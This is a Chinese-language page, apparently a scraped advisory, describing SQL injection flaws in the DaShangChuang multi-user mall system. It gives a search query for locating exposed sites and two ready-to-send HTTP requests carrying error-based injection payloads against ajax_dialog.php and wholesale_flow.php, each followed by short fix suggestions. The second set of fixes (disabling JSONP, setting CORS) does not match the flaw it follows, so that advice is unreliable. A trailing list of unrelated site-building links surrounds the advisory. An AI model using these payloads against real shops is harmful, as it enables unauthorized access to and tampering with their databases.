当前位置: 首页 > wzjs >正文

车辆保险网站三站合一网站营销

车辆保险网站,三站合一网站营销,北京seo如何排名,建设完网站成功后需要注意什么问题ajax_dialog.php存在SQL注入漏洞 大商创多用户商城系统 ajax_dialog.php接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但…

ajax_dialog.php存在SQL注入漏洞

大商创多用户商城系统 ajax_dialog.php接口处存在SQL注入漏洞,未经身份验证攻击者可通过输入恶意 SQL 代码,突破系统原本设定的访问规则,未经授权访问、修改或删除数据库中的各类敏感信息,包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。

搜索语法

body="dsc-choie"

流程

GETT /ajax_dialog.php?_=1600309513833&act=getUserInfo&brand_id=extractvalue(1,concat(0x7e,md5(123)))&is_jsonp=1&jsoncallback=jQuery19106489774159975068_1600309513832&seckillid=null&temp=backup_tpl_1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

修复建议

1.禁用错误回显

2.使用预处理语句(PDO/MySQLi),避免SQL拼接

3.部署WAF(Web应用防火墙)

wholesale_flow.php存在SQL注入漏洞

流程

POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closerec_ids[]=extractvalue(1,concat(0x7e,version()))

修复建议

1.禁用JSONP

2.设置CORS头,限制跨域访问

3.设置前端防护

http://www.dtcms.com/wzjs/558715.html

相关文章:

  • 昆明做网站ynlongtou专业做营销网站
  • 成都网站建设推广在做网站制作的摘要
  • 江门网站快速排名建站公司的服务内容
  • 网站设计好学吗cq设计网
  • 如何建设网站兴田德润怎么联系乔拓云建站平台
  • 企业网站建设的总体目标免费编程软件小学生
  • 重庆森林为什么叫这个名字上海优化seo公司
  • 网站做常规优化即墨网络有限公司
  • 二级域名怎么做网站备案做网站做什么赚钱
  • 如何建设一个属于自己的网站免费网站建设制作
  • 网站开发算是软件开发设计网站的流程
  • 网站国外建设小程序登录网址
  • ssh鲜花礼品网站建设珠海 电商 网站建设
  • 东莞市行业网站制作公司怎么做网络销售的网站
  • 泰州做房产的网站接入服务商网站备案管理系统技术规范要求
  • 网站 数据库 sql 导入数据库文件博客页面html模板
  • 厦门网站制作案例二级网站建设情况说明
  • 蔬菜类网站建设规划书做一个html页面多少钱
  • 汽配网站源码app公司网站建设
  • 广州化妆品网站设计企业展厅设计公司虎
  • 教师做课题可以参考什么网站简单网页制作html
  • 电子商务网站规划原则wordpress 中文包
  • 在线生成个人网站app酒店网站建设的需求分析报告
  • 海珠网站建设制作崇州网站建站
  • 邢台市桥西住房建设局网站域名ip地址在线查询
  • 专业的外贸网站建设公司网站开发一般用的什么架构
  • 网站备案时间有效期上海连锁设计公司
  • 网站建设报告内容wordpress调用文章代码
  • 以网站和什么为重点建设平台做微商如何引流推广怎么找客源
  • 盐城市城乡和住房建设厅网站文本分析网站